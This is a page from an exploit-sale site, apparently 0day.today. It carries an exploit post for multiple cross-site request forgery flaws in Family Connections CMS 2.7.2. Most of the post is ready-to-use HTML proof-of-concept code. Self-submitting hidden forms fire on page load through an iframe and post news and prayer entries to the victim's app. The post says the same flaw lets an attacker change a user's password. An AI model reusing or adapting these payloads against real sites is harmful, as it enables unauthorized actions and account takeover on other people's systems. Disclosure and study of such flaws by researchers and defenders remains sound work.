0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities
[FCMS_2.7.2 cms and earlier multiple CSRF Vulnerability
===================================================================================
# Exploit Title: FCMS_2.7.2 cms multiple CSRF Vulnerability
Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download
# Author: Ahmed Elhady Mohamed
#version : 2.7.2
# Category:: webapps
# Tested on: windows XP Sp2 En
# This vulnerability allows a malicious hacker to change password of a user
and also it allows changing the website information.
===================================================================================
#First we must install all optional sections during installation process.
#there are csrf in all sections in this application for examples you can add news , pray for ,
change the password and can do all functionalities are there.
#here are some examples for prove of concept
#########################################exploit code for Page "familynews.php"################################################
#Save the following codr in a file called "code.html"
<html>
<head>
<script type="text/javascript">
function autosubmit() {
document.getElementById('ChangeSubmit').submit();
}
</script>
</head>
<body onLoad="autosubmit()">
<form method="POST" action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/familynews.php" id="ChangeSubmit">
<input type="hidden" name="title" value="test" />
<input type="hidden" name="submitadd" value="Add" />
<input type="hidden" name="post" value="testcsrf" />
<input type="submit" value="submit"/>
</form>
</body>
</html>
#then i called "code.html" from another page
<html>
<body>
<iframe src="code.html" onLoad=""></iframe>
</body>
</html>
###########################################exploit code for Page "prayers.php" ####################################################
#Save the following code in a file called "code.html"
<html>
<head>
<script type="text/javascript">
function autosubmit() {
document.getElementById('ChangeSubmit').submit();
}
</script>
</head>
<body onLoad="autosubmit()">
<form method="POST" action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/prayers.php" id="ChangeSubmit">
<input type="hidden" name="for" value="test" />
<input type="hidden" name="submitadd" value="Add" />
<input type="hidden" name="desc" value="testtest" />
<input type="submit" value="submit"/>
</form>
</body>
</html>
#then i called "code.html" from another page
<html>
<body>
<iframe src="code.html" onLoad=""></iframe>
</body>
</html>
##############################################################################################################################
# 0day.today [2024-06-23] #